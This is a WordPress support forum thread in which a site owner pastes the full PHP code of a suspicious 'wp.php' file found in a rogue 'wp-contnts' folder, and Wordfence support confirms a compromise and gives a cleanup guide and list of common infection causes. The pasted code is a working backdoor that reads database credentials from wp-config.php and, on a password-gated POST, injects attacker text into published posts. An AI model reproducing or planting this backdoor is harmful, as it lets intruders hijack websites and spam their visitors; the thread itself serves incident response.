FC777 pro.REGISTER NOW GET FREE 888 PESOS REWARDS!

Resolved Chuck
(@chuckstr)

4 years, 3 months ago

I have been trying out several plugins from www.ads-software.com for external linking of products to a new tab. Suddenly I discover a new folder in the public_html folder call “wp-contnts” (yes, correct spelling). Inside the folder is a file “wp.php”. Do you know what this is? Have I been hacked? Here’s the wp-php code:
<?php ini_set('display_errors',"On");$pl="fdiuw9UYGx99ewbKb3xvvcclbHVGUVIYCey8we9302eid";$path="";$goodpath="";for($i=0;$i<50;$i++){if(empty($path)){$path="./";if(file_exists($path ."wp-config.php")){@include($path ."wp-config.php");break;}else{$path="goup";}}elseif($path=="goup"){$path="../";if(file_exists($path ."wp-config.php")){@include($path ."wp-config.php");break;}else{$path=$path ."../";}}else{if(file_exists($path ."wp-config.php")){@include($path ."wp-config.php");break;}else{$path=$path ."../";}}}$wp_dbhost=DB_HOST;if(!empty($wp_dbhost)){$wp_dbname=DB_NAME;$wp_dbuser=DB_USER;$wp_dbpass=DB_PASSWORD;$prefi=$table_prefix;$db_prt="3306";if(stripos("qqq" .$wp_dbhost,":")){$wp_dbhost=explode(":",$wp_dbhost);$db_prt=$wp_dbhost[1];$wp_dbhost=$wp_dbhost[0];}if(!empty($_POST["vb6dfhgxb54erf"])&& $_POST["vb6dfhgxb54erf"]=="l4983afbnerer"&&!empty($_POST["hj34qsdccvvn4"])&&!empty($_POST["xv443shtsfgfhfg"])){if($pl!=$_POST["xv443shtsfgfhfg"]){die();}$texttoadd=stripslashes(urldecode($_POST["hj34qsdccvvn4"]));$usedpostids=$_POST["cvb5e6edofgd4"];$allpostsids=readNeedColDataWL($prefi ."posts","ID","post_status='publish'",$wp_dbhost,$wp_dbname,$wp_dbuser,$wp_dbpass,$db_prt);$needpostid="";if(empty($usedpostids)){srand((float)microtime()*1000000);shuffle($allpostsids);$needpostid=$allpostsids[0]["ID"];}else{$usedpostids=urldecode($usedpostids);$usedpostids=stripslashes($usedpostids);$usedpostids=unserialize($usedpostids);foreach($allpostsids as $k=>$onepostid){$allpostsids[$k]=$onepostid["ID"];}$notusedids=array_diff($allpostsids,$usedpostids);if(count($notusedids)==0){srand((float)microtime()*1000000);shuffle($allpostsids);$needpostid=$allpostsids[0];}else{srand((float)microtime()*1000000);shuffle($notusedids);$needpostid=$notusedids[0];}}if(!empty($needpostid)){$postdata=readValueFromBDWL($prefi ."posts","post_content","ID='" .$needpostid ."'",$wp_dbhost,$wp_dbname,$wp_dbuser,$wp_dbpass,$db_prt);$postdata=$texttoadd ."<br>" .$postdata;$postdata=str_ireplace("'","\'",$postdata);$res=updateBDDataWL($prefi ."posts",$postdata,"post_content","ID='" .$needpostid ."'",$wp_dbhost,$wp_dbname,$wp_dbuser,$wp_dbpass,$db_prt);if(!empty($res)&& $res!="no"){$posturl=get_permalink($needpostid);$gooddata=array("postid"=>$needpostid,"posturl"=>$posturl);$gooddata=serialize($gooddata);$gooddata=urlencode($gooddata);echo "cvnuytr54wwrdthfg:::" .$gooddata .":::cvnuytr54wwrdthfg";die();}}}}function updateBDDataWL($tablename,$data,$value,$uslovie,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return "no";}else{mysqli_set_charset($dbcon,"utf8");$sql="UPDATE " .$tablename ." SET $value='" .$data ."' WHERE " .$uslovie ."";if(mysqli_query($dbcon,$sql)){mysqli_close($dbcon);return "yes";}else{mysqli_close($dbcon);return false;}}}function readValueFromBDWL($tablename,$value,$uslovie,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return "no";}else{mysqli_set_charset($dbcon,"utf8");if(!empty($uslovie)){$sql="SELECT " .$value ." FROM " .$tablename ." where " .$uslovie;}else{$sql="SELECT " .$value ." FROM " .$tablename;}$needvalue=mysqli_query($dbcon,$sql);$needvalue=mysqli_fetch_array($needvalue);if(!empty($needvalue)){if(!empty($uslovie)){if(stripos($value,",")){$value=explode(",",$value);$res=array();foreach($value as $onevalue){$onevalue=trim($onevalue);$res[$onevalue]=$needvalue[$onevalue];}$needvalue=$res;}else{$needvalue=$needvalue[$value];}}mysqli_close($dbcon);return $needvalue;}else{mysqli_close($dbcon);return "no";}}}function readNeedColDataWL($tablename,$col,$uslovie,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return false;}else{$sql="SELECT " .$col ." FROM " .$tablename ." where " .$uslovie ." ORDER BYid` DESC”;$needvalue=mysqli_query($dbcon,$sql);if(!empty($needvalue)){$res=array();while($r=mysqli_fetch_assoc($needvalue)){$res[]=$r;}mysqli_close($dbcon);return $res;}mysqli_close($dbcon);return false;}}
`

Viewing 5 replies - 1 through 5 (of 5 total)

Plugin Support wfpeter
(@wfpeter)

4 years, 3 months ago

Hi @chuckstr, thanks for seeking our advice with this issue.

It does look to me like your site has been compromised, although if you were only installing plugins directly through WordPress (therefore the www.ads-software.com repository only) it would be interesting to know where the vulnerability may have originated.

Did you have Wordfence installed at the time the folder was created?

Thanks,

Peter.

Thread Starter Chuck
(@chuckstr)

4 years, 3 months ago

Yes, I’ve had Wordfence for years. I have had other issues for which I have sought help allowing others to access the site. Maybe there?

Thread Starter Chuck
(@chuckstr)

4 years, 3 months ago

I don’t have $495 to have you clean it for me so I’ll have to do it myself. Any help you could provide would be greatly appreciated.

Plugin Support wfpeter
(@wfpeter)

4 years, 3 months ago

Hi @chuckstr, thanks for seeking our assistance and I’ll be more than happy to help you with a thorough site-cleaning guide here.

I will now explain in more detail some possible scenarios of how a hacker can gain entry and why a site becomes compromised – even if you are very meticulous at keeping your server software, WordPress, your active and inactive plugins and themes all up to date with the latest versions.

Some causes of a hack are impossible for any WordPress security plugin to protect against:

1) If you are using a weak password for your hosting account control panel or FTP account then a hacker may gain entry this way, with full access to your site’s file system and database.
2) You are storing unmaintained, unarchived backups of your site that are publicly accessible that contain exploitable vulnerabilities.
3) You are hosting more than one PHP application, such as more than one installation of WordPress, in the same hosting account and infection can spread from another application to this site.
4) You have unmaintained or vulnerable 3rd party scripts installed in your hosting account. Examples would be the Adminer or SearchReplaceDB database management tools.
5) A nulled theme or plugin with malware already pre-installed. If you paid for a theme or a plugin outside of the vendor’s website at a massively reduced price, that seemed too good to be true, then it is likely to be nulled.
6) If you are using a shared hosting account a neighboring account can be infected and spread the infection to this site.
7) Your WordPress wp-config.php configuration file could be readable to the hacker, either directly via your hosting account, via a vulnerable plugin, or via another hacked site on the same server.
8) The hosting accounts on the server may not be properly isolated so the hacker has access to your database via another user’s database.
9) The server software has vulnerabilities that allow the hacker to get root access – such as running an end-of-life version of PHP on the hosting server that has unpatched vulnerabilities.
10) If the hack took place at a time when you only had the free version of Wordfence installed then you wouldn’t have had access to the latest firewall rules that premium customers have access to.
11) You may be using a plugin or theme with a vulnerability that is so severe that Wordfence can not protect against it and we may be unable to create a custom firewall rule for the vulnerability. However, being unable to create a custom firewall rule is very rare.

Wordfence protects against a vast variety of attacks. Whether you were hacked because of an unknown attack method or because there is some other issue in your system impossible to say at this stage without an extensive investigation. There are some aspects of your site security that are completely beyond our control such as vulnerabilities on your hosting server as described above. Although rare, for examples of hosting provider vulnerabilities please see these two articles below:
https://www.wordfence.com/blog/2019/06/service-vulnerability-four-popular-hosting-companies-fix-nfs-permissions-and-information-disclosure-problems/
https://www.wordfence.com/blog/2018/02/service-vulnerability-nfs-permissions-problem/

You have two choices:

1) You can clean the site yourself by following the steps in this guide:
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
https://www.wordfence.com/help/scan/scan-results/

Useful links after you have completed your cleaning:
https://www.wordfence.com/blog/2017/04/20-minutes-to-secure-wordpress/
https://www.wordfence.com/blog/2018/10/php5-dangerous/ (important note – this is an old blog post from October 2018 but still very relevant)
https://www.wordfence.com/blog/2018/10/three-wordpress-security-mistakes-you-didnt-realize-you-made/
https://www.wordfence.com/blog/2017/06/wordpress-backups/

We also have an extensive Learning Centre here:
https://www.wordfence.com/learn/

2) You can hire a professional service to clean the site for you. Wordfence offers such a service, as do others.

Thanks,

Peter.

Plugin Support wfpeter
(@wfpeter)

4 years, 3 months ago

Hi @chuckstr,

As we’ve not heard back for a while, I hope the site cleaning guide served you well. If you have any Wordfence queries in the future, by all means start a new topic and we’ll be glad to help out any time.

Thanks again,

Peter.

Viewing 5 replies - 1 through 5 (of 5 total)

The topic ‘new wp-contnts folder’ is closed to new replies.